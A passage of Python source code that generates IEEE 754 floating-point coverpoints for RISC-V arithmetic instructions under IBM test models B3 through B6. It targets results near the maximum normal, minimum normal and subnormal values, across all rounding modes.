                ir_dataset.append([ieee754_num[k].split('p')[0]+str(i)+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k]])
        for i in range(len(ir_dataset)):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        ieee754_num = []
        lsb = []
        for i in dsubnorm+dnorm:
            if int(i[-1],16)%2 == 1:
                lsb.append('1')
                lsb.append('1')
            else:
                lsb.append('0')
                lsb.append('0')
            float_val = str(fields_dec_converter(64,i))
            if float_val[0] != '-':
                ieee754_num.append(float_val)
                ieee754_num.append('-'+float_val)
            else:
                ieee754_num.append(float_val)
                ieee754_num.append(float_val[1:])
        ir_dataset = []
        # For doubles the guard/sticky perturbation is added as a tiny Decimal
        # offset instead of editing the hex string; entries stay as strings.
        for k in range(len(ieee754_num)):
            for i in range(2,16,2):
                grs = '{:04b}'.format(i)
                if ieee754_num[k][0] == '-': sign = '1'
                else: sign = '0'
                ir_dataset.append([str(Decimal(ieee754_num[k].split('e')[0])+Decimal(pow(i*16,-14)))+'e'+ieee754_num[k].split('e')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k]])
    b4_comb = []
    # Solve for rs2 so that opcode(rs1, rs2[, rs3]) reproduces the chosen
    # intermediate result; rs1/rs3 are random in [1, maxnum).
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        rs3 = random.uniform(1,maxnum)
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used below — looks like
        # leftover debugging; kept as-is.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b4_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    k = 0
    # Each operand tuple is emitted once for every rounding mode (0..4).
    for c in b4_comb:
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B3 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b4(flen, opcode, ops, seed=-1):
    '''
    IBM Model B4 Definition:
        This model creates a test-case for each of the following constraints on the
        intermediate results:
            1. All the numbers in the range [+MaxNorm - 3 ulp, +MaxNorm + 3 ulp]
            2. All the numbers in the range [-MaxNorm - 3 ulp, -MaxNorm + 3 ulp]
            3. A random number that is larger than +MaxNorm + 3 ulp
            4. A random number that is smaller than -MaxNorm - 3 ulp
            5. One number for every exponent in the range [MaxNorm.exp - 3, MaxNorm.exp + 3] for positive and negative numbers

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int

    Abstract Dataset Description:
        Intermediate Results = [[MaxNorm-3 ulp, MaxNorm+3 ulp], [-MaxNorm-3 ulp, -MaxNorm+3 ulp], Random Num > MaxNorm+3 ulp, Random Num < -MaxNorm-3 ulp, [MaxNorm.exp-3, MaxNorm.exp+3]]
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The intermediate results dataset is populated in accordance with the abstract dataset defined above.
        - Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the "Decimal" module was utilized.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the "floatingPoint_tohex" function.
    '''
    opcode = opcode.split('.')[0]
    # High Decimal precision: results near/above MaxNorm overflow a float.
    getcontext().prec = 40
    # Deterministic per-opcode seeds when the caller did not supply one.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    if flen == 32:
        ieee754_maxnorm_p = '0x1.7fffffp+127'
        ieee754_maxnorm_n = '0x1.7ffffep+127'
        maxnum = float.fromhex(ieee754_maxnorm_p)
        ir_dataset = []
        # Extra hex digit i (even 2..14) after the mantissa realises the
        # guard/round/sticky combinations around +/- MaxNorm.
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+str(i)+'p'+ieee754_maxnorm_p.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp'])
            ir_dataset.append([ieee754_maxnorm_n.split('p')[0]+str(i)+'p'+ieee754_maxnorm_n.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp'])
        # One value per exponent in [MaxNorm.exp - 3, MaxNorm.exp + 3].
        for i in range(-3,4):
            ir_dataset.append([ieee754_maxnorm_p.split('p')[0]+'p'+str(127+i),' | Exponent = '+str(127+i)+' Number = +ve'])
            ir_dataset.append(['-'+ieee754_maxnorm_n.split('p')[0]+'p'+str(127+i),' | Exponent = '+str(127+i)+' Number = -ve'])
        for i in range(len(ir_dataset)):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        maxdec_p = str(maxnum)
        maxdec_n = str(float.fromhex('0x1.ffffffffffffep+1023'))
        ir_dataset = []
        # Doubles: add a tiny Decimal offset instead of editing the hex string;
        # entries stay as decimal strings so they can exceed float range.
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(maxdec_p.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_p.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm + '+str(int(grs[0:3],2))+' ulp'])
            ir_dataset.append([str(Decimal(maxdec_n.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+maxdec_n.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Maxnorm - '+str(int(grs[0:3],2))+' ulp'])
        for i in range(-3,4):
            ir_dataset.append([str(random.uniform(1,maxnum)).split('e')[0]+'e'+str(int(math.log(pow(2,1023+i),10))),' | Exponent = '+str(1023+i)+' Number = +ve'])
            ir_dataset.append([str(-1*random.uniform(1,maxnum)).split('e')[0]+'e'+str(int(math.log(pow(2,1023+i),10))),' | Exponent = '+str(1023+i)+' Number = -ve'])
    b4_comb = []
    # Solve for rs2 so that opcode(rs1, rs2[, rs3]) reproduces the chosen
    # intermediate result; rs1/rs3 are random in [1, maxnum).
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        rs3 = random.uniform(1,maxnum)
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used below — looks like
        # leftover debugging; kept as-is.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b4_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b4_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    k = 0
    # Each operand tuple is emitted once for every rounding mode (0..4).
    for c in b4_comb:
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B4 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b5(flen, opcode, ops, seed=-1):
    '''
    IBM Model B5 Definition:
        This model creates a test-case for each of the following constraints on the intermediate results:
            1. All the numbers in the range [+MinSubNorm - 3 ulp, +MinSubNorm + 3 ulp]
            2. All the numbers in the range [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp]
            3. All the numbers in the range [MinNorm - 3 ulp, MinNorm + 3 ulp]
            4. All the numbers in the range [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp]
            5. All the numbers in the range [MinNorm - 3 ulp, MinNorm + 3 ulp]
            6. All the numbers in the range [-MinNorm - 3 ulp, -MinNorm + 3 ulp]
            7. A random number in the range (0, MinSubNorm)
            8. A random number in the range (-MinSubNorm, -0)
            9. One number for every exponent in the range [MinNorm.exp, MinNorm.exp + 5]

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int

    Abstract Dataset Description:
        Intermediate Results = [+MinSubNorm - 3 ulp, +MinSubNorm + 3 ulp], [-MinSubNorm - 3 ulp, -MinSubNorm + 3 ulp] , [MinNorm - 3 ulp, MinNorm + 3 ulp] , [-MinNorm - 3 ulp, -MinNorm + 3 ulp] , Random Num in (0, MinSubNorm), Random Num in (-MinSubNorm, -0), One Num for every exp in [MinNorm.exp, MinNorm.exp + 5]]
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The intermediate results dataset is populated in accordance with the abstract dataset defined above.
        - Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. Inorder to represent numbers that went out of range of the maximum representable number in python, the "Decimal" module was utilized.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the "floatingPoint_tohex" function.
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    # High Decimal precision: subnormal-neighbourhood results underflow a float.
    getcontext().prec = 40
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        ir_dataset = []
        # Extra hex digit i (even 0..14) after the mantissa realises the
        # guard/round/sticky combinations around MinSubNorm.
        for i in range(0,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_minsubnorm.split('p')[0]+str(i)+'p'+ieee754_minsubnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp'])
        ieee754_minnorm = '0x1.000000p-126'
        for i in range(0,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([ieee754_minnorm.split('p')[0]+str(i)+'p'+ieee754_minnorm.split('p')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp'])
        # One value per exponent in [MinNorm.exp, MinNorm.exp + 5].
        minnorm_Exp = ['0x1.000000p-126','0x1.000000p-125','0x1.000000p-124','0x1.000000p-123','0x1.000000p-122','0x1.000000p-121']
        for i in minnorm_Exp:
            ir_dataset.append([i,' | Exponent = MinNorm.exp + '+str(126+int(i.split('p')[1]))])
        n = len(ir_dataset)
        # Convert to floats and mirror every entry with its negation.
        for i in range(n):
            ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
            ir_dataset.append([-1*ir_dataset[i][0],ir_dataset[i][1]])
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        minsubdec = '5e-324'
        ir_dataset = []
        # Doubles: add a tiny Decimal offset instead of editing the hex string;
        # entries stay as decimal strings so they can be smaller than any float.
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(minsubdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minsubdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minsubnorm + '+str(int(grs[0:3],2))+' ulp'])
        minnormdec = '2.2250738585072014e-308'
        ir_dataset.append([minsubdec, ' | Guard = 0 Round = 0 Sticky = 0 --> Minsubnorm + 0 ulp'])
        ir_dataset.append([minnormdec,' | Guard = 0 Round = 0 Sticky = 0 --> Minnorm + 0 ulp'])
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(minnormdec.split('e')[0])+Decimal(pow(i*16,-14)))+'e'+minnormdec.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> Minnorm + '+str(int(grs[0:3],2))+' ulp'])
        minnorm_Exp = ['4.450147717014403e-308','8.900295434028806e-308','1.780059086805761e-307','3.560118173611522e-307','7.120236347223044e-307']
        k = 1
        for i in minnorm_Exp:
            ir_dataset.append([i,' | Exponent = MinNorm.exp + '+str(k)])
            k += 1
        n = len(ir_dataset)
        # Mirror every entry with its negation (string prefix keeps precision).
        for i in range(n):
            ir_dataset.append(['-'+ir_dataset[i][0],ir_dataset[i][1]])
    # Deterministic per-opcode seeds when the caller did not supply one.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
        elif opcode in 'fmul':
            random.seed(2)
        elif opcode in 'fdiv':
            random.seed(3)
        elif opcode in 'fsqrt':
            random.seed(4)
        elif opcode in 'fmadd':
            random.seed(5)
        elif opcode in 'fnmadd':
            random.seed(6)
        elif opcode in 'fmsub':
            random.seed(7)
        elif opcode in 'fnmsub':
            random.seed(8)
    else:
        random.seed(seed)
    b5_comb = []
    # Solve for rs2 so that opcode(rs1, rs2[, rs3]) reproduces the chosen
    # intermediate result; rs1/rs3 are random in [1, maxnum).
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1,maxnum)
        rs3 = random.uniform(1,maxnum)
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir_dataset[i][0] - rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0]) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmul':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            if flen == 32:
                rs2 = rs1/ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fsqrt':
            if flen == 32:
                rs2 = ir_dataset[i][0]*ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])*Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            if flen == 32:
                rs2 = (ir_dataset[i][0] - rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = (rs3 - ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = (ir_dataset[i][0] + rs3)/rs1
            elif flen == 64:
                rs2 = (Decimal(ir_dataset[i][0]) + Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*(rs3 + ir_dataset[i][0])/rs1
            elif flen == 64:
                rs2 = -1*(Decimal(rs3) + Decimal(ir_dataset[i][0]))/Decimal(rs1)
        # NOTE(review): x1/x2/x3 are computed but never used below — looks like
        # leftover debugging; kept as-is.
        if(flen==32):
            x1 = struct.unpack('f', struct.pack('f', rs1))[0]
            x2 = struct.unpack('f', struct.pack('f', rs2))[0]
            x3 = struct.unpack('f', struct.pack('f', rs3))[0]
        elif(flen==64):
            x1 = rs1
            x2 = rs2
            x3 = rs3
        if opcode in ['fadd','fsub','fmul','fdiv']:
            b5_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
        elif opcode in 'fsqrt':
            b5_comb.append((floatingPoint_tohex(flen,float(rs2)),))
        elif opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b5_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    k = 0
    # Each operand tuple is emitted once for every rounding mode (0..4).
    for c in b5_comb:
        for rm in range(5):
            cvpt = ""
            for x in range(1, ops+1):
                # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '+str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += ir_dataset[k][1]
            coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B5 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b6(flen, opcode, ops, seed=-1):
    '''
    IBM Model B6 Definition:
        This model tests intermediate results in the space between -MinSubNorm and
        +MinSubNorm. For each of the following ranges, we select 8 random test cases,
        one for every combination of the LSB, guard bit, and sticky bit.

        1. -MinSubNorm < intermediate < -MinSubNorm / 2
        2. -MinSubNorm / 2 <= intermediate < 0
        3. 0 < intermediate <= +MinSubNorm / 2
        4. +MinSubNorm / 2 < intermediate < +MinSubNorm

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int
    :return: list of coverpoint strings (one per dataset entry and rounding mode)

    Abstract Dataset Description:
        Intermediate Results = [Random number ∈ (-MinSubNorm, -MinSubNorm/2), Random number ∈ (-MinSubNorm/2, 0), Random number ∈ (0, +MinSubNorm/2), Random number ∈ (+MinSubNorm/2, +MinSubNorm)]
        {All 8 combinations of guard, round and sticky bit are tested for every number}
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The intermediate results dataset is populated in accordance with the abstract dataset defined above.
        - Intermediate results can be out of the range of what is representable in the specified format; they should only be viewed numerically. In order to represent numbers that went out of range of the maximum representable number in python, the "Decimal" module was utilized.
        - These operand values are treated as decimal numbers until their derivation after which they are converted into their respective IEEE754 hexadecimal floating point formats using the "floatingPoint_tohex" function.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    # Strip the precision suffix ("fmul.s" -> "fmul") so the opcode comparisons work.
    opcode = opcode.split('.')[0]
    # High Decimal precision so tiny subnormal-range values survive the string round-trips below.
    getcontext().prec = 40
    if seed == -1:
        # Fixed per-opcode seeds keep the generated coverpoints reproducible run-to-run.
        if opcode in 'fmul':
            random.seed(0)
        elif opcode in 'fdiv':
            random.seed(1)
        elif opcode in 'fmadd':
            random.seed(2)
        elif opcode in 'fnmadd':
            random.seed(3)
        elif opcode in 'fmsub':
            random.seed(4)
        elif opcode in 'fnmsub':
            random.seed(5)
    else:
        random.seed(seed)
    if flen == 32:
        ir_dataset = []
        ieee754_minsubnorm_n = '-0x0.000001p-127'
        minnum = float.fromhex(ieee754_minsubnorm_n)
        # One random base value per range; i's 4-bit pattern supplies the
        # guard/round/sticky combination and a tiny i-derived offset perturbs
        # the base so those extra bits differ per entry.
        r=str(random.uniform(minnum,minnum/2))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm, -MinSubNorm / 2)'])
        r=str(random.uniform(minnum/2,0))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm / 2, 0)'])
        r=str(random.uniform(0,abs(minnum/2)))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (0, +MinSubNorm / 2)'])
        r=str(random.uniform(abs(minnum/2),abs(minnum)))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-7)))+'e'+r.split('e')[1],' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (+MinSubNorm / 2, +MinSubNorm)'])
    elif flen == 64:
        ir_dataset = []
        ieee754_minsubnorm_n = '-0x0.0000000000001p-1022'
        minnum = float.fromhex(ieee754_minsubnorm_n)
        # NOTE(review): unlike the flen==32 branch, these entries do not
        # re-append 'e'+r.split('e')[1], so the stored value loses its
        # exponent and is no longer in the subnormal range — confirm intent.
        r=str("{:.2e}".format(random.uniform(minnum,minnum/2)))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm, -MinSubNorm / 2)'])
        r=str("{:.2e}".format(random.uniform(minnum/2,0)))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (-MinSubNorm / 2, 0)'])
        r=str("{:.2e}".format(random.uniform(0,abs(minnum/2))))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (0, +MinSubNorm / 2)'])
        r=str("{:.2e}".format(random.uniform(abs(minnum/2),abs(minnum))))
        for i in range(2,16,2):
            grs = '{:04b}'.format(i)
            ir_dataset.append([str(Decimal(r.split('e')[0])+Decimal(pow(i*16,-14))),' | Guard = '+grs[0]+' Round = '+grs[1]+' Sticky = '+grs[2]+' --> IR ∈ (+MinSubNorm / 2, +MinSubNorm)'])
    b6_comb = []
    for i in range(len(ir_dataset)):
        # rs1/rs3 are tiny random operands; rs2 is then back-solved so that
        # rs1 <op> rs2 (with rs3 for fused ops) reproduces the target
        # intermediate result ir_dataset[i][0].
        rs1 = random.uniform(0,1e-30)
        rs3 = random.uniform(0,1e-30)
        if opcode in 'fmul':
            rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
        elif opcode in 'fdiv':
            rs2 = Decimal(rs1)/Decimal(ir_dataset[i][0])
        elif opcode in 'fmadd':
            rs2 = (Decimal(ir_dataset[i][0]) - Decimal(rs3))/Decimal(rs1)
        elif opcode in 'fnmadd':
            rs2 = (Decimal(rs3) - Decimal(ir_dataset[i][0]))/Decimal(rs1)
